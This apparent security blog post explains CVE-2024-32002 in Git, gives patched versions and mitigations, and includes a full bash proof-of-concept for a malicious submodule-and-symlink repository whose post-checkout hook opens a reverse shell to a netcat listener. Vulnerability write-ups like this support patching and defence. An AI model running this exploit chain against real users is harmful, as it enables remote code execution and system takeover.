CVE-2024-32002-PoC

30 July 2024 - 7 mins read time
Tags: Git CVE PoC Vulnerability RCE

Introduction

Git is a widely-used distributed version control system that allows developers to track changes in their codebase, collaborate with others, and manage their projects efficiently. However, like any software, Git is not immune to vulnerabilities. One such critical vulnerability, identified as CVE-2024-32002, has been discovered in Git versions prior to 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. This vulnerability exploits a bug in Git’s handling of submodules, potentially leading to remote code execution.

The Vulnerability Explained

Submodules in Git

Submodules in Git are repositories nested inside another repository. They allow you to keep a Git repository as a subdirectory of another Git repository. This is useful for including and tracking dependencies or libraries that are managed in separate repositories.

Hook Scripts

Git hooks are scripts that run automatically at certain points in the Git workflow. For example, a post-checkout hook runs after a successful git checkout command. By exploiting this vulnerability, an attacker can place a malicious hook script in the .git/hooks/ directory, which will be executed without the user’s knowledge during the clone operation.

The Exploit

The vulnerability arises from the way Git handles submodules. In the affected versions, an attacker can craft a repository with submodules in such a way that Git is tricked into writing files not into the submodule’s worktree but into the .git/ directory of the parent repository. This manipulation allows an attacker to write a malicious hook script that will be executed during the clone operation.

Impact of the Vulnerability

The impact of CVE-2024-32002 is severe. By exploiting this vulnerability, an attacker can execute arbitrary code on the targeted system with the privileges of the user running the affected Git application. This can lead to:

• Data Theft: The attacker can access and exfiltrate sensitive data from the victim’s system.
• System Compromise: The attacker can gain control over the victim’s system, potentially installing malware or creating backdoors.
• Further Propagation: The attacker can use the compromised system to launch further attacks on other systems or networks.

Proof of Concept (PoC) for CVE-2024-32002 Exploit

This PoC demonstrates how an attacker can exploit the CVE-2024-32002 vulnerability in Git to execute a malicious hook script. The script sets up a malicious repository with a submodule and a symbolic link, then clones the repository to trigger the execution of the malicious hook.

Scenario:

For exploiting the CVE-2024-32002 vulnerability I’m using my own Gitea server running locally in a Docker container and a Virtual machine of Windows 10 as a victim machine.

PoC script - Link

Step-by-Step Explanation

1. Configure Git: Set global Git configurations to allow file protocols and enable symbolic links.
2. Clean Up: Remove any existing repo1 and repo2 directories to start fresh.
3. Clone Malicious Repository: Clone a repository (repo1) from the attacker’s server.
4. Create Malicious Hook: Create a post-checkout hook in repo1 that executes a payload.
5. Push Malicious Hook: Add, commit, and push the malicious hook to the remote repository.
6. Set Up Submodule: Clone another repository (repo2), add repo1 as a submodule, and create a symbolic link to the .git directory.
7. Trigger Exploit: Clone the malicious repository to execute the hook and start a reverse shell.

PoC Script

#!/bin/bash

# Configure Git to allow file protocol and enable symbolic links
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

# Clean up any existing repositories
rm -rf repo1
rm -rf repo2

# Clone the malicious repository
git clone http://<ip>:<port>/<name of the owner>/repo1.git
cd repo1

# Create a malicious post-checkout hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/sh
<Payload>
EOF
chmod +x y/hooks/post-checkout

# Add, commit, and push the malicious hook
git add y/hooks/post-checkout
git commit -m "Add malicious post-checkout hook"
git push
cd ..

# Clone another repository and set up the submodule
git clone http://<ip>:<port>/<name of the owner>/repo2.git
cd repo2
git submodule add --name x/y "http://<ip>:<port>/<name of the owner>/repo1.git" A/modules/x
git commit -m "Add submodule"

# Create a symbolic link to the .git directory
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "Add symbolic link"
git push

# Clone the malicious repository to trigger the hook
git clone http://<ip>:<port>/<name of the owner>/repo2.git

Execution

1. Run the PoC Script: Execute the script on the attacker’s machine (Execute the commands one by one for better result)
2. Start Netcat Listener: On the attacker’s machine, start a Netcat listener to catch the reverse shell connection:

   nc -lvp <attacker_port>
   

3. Clone the Malicious Repository: On the victim’s machine, clone the repo2 repository:

   git clone http://<ip>:<port>/<name of the owner>/repo2.git
   

This will trigger the execution of the post-checkout hook, establishing a reverse shell connection to the attacker’s machine.

Important Note

This PoC is for educational purposes only. Exploiting vulnerabilities without permission is illegal and unethical. Always ensure you have explicit permission before testing or exploiting vulnerabilities.

Mitigation and Patching

The Git development team has addressed this vulnerability in the following versions:

• 2.45.1
• 2.44.1
• 2.43.4
• 2.42.2
• 2.41.1
• 2.40.2
• 2.39.4

Users are strongly advised to update to these versions to protect against this vulnerability. Updating Git can be done using package managers or by downloading the latest version from the official Git website.

Updating Git on Linux

For example, on a Debian-based system, you can update Git using the following commands:

sudo apt-get update
sudo apt-get install git

On a Red Hat-based system, you can use:

sudo yum update git

Updating Git on Windows

• Download the latest Git for Windows installer from the official Git website.

• Run the installer and follow the on-screen instructions to update Git.

Updating Git on macOS

On macOS, if you have installed Git via Homebrew, you can update it using:

brew update
brew upgrade git

Additional Precautions

In addition to updating Git, users can take further precautions to mitigate the risk:

• Disable Symbolic Link Support: By disabling symbolic link support in Git, the described attack vector can be neutralized. This can be done using the following command:

  git config --global core.symlinks false
  

• Avoid Cloning from Untrusted Sources: As a general best practice, avoid cloning repositories from untrusted or unknown sources to minimize the risk of such attacks.

Conclusion

CVE-2024-32002 highlights the importance of keeping software up to date and being cautious about the sources from which code is cloned. By understanding the nature of this vulnerability and taking appropriate actions, users can protect their systems from potential exploitation.

Staying vigilant and proactive in applying security updates and best practices is crucial in maintaining the integrity and security of your development environment. Ensure your Git installations are up to date and follow the recommended precautions to safeguard against such vulnerabilities.

Stay safe and secure in your coding endeavors!

References:

• https://github.com/git/git/security/advisories/GHSA-xfc6-vwr8-r389
• https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv
• https://nvd.nist.gov/vuln/detail/CVE-2024-32002
• https://github.com/git/git/commit/97065761333fd62db1912d81b489db938d8c991d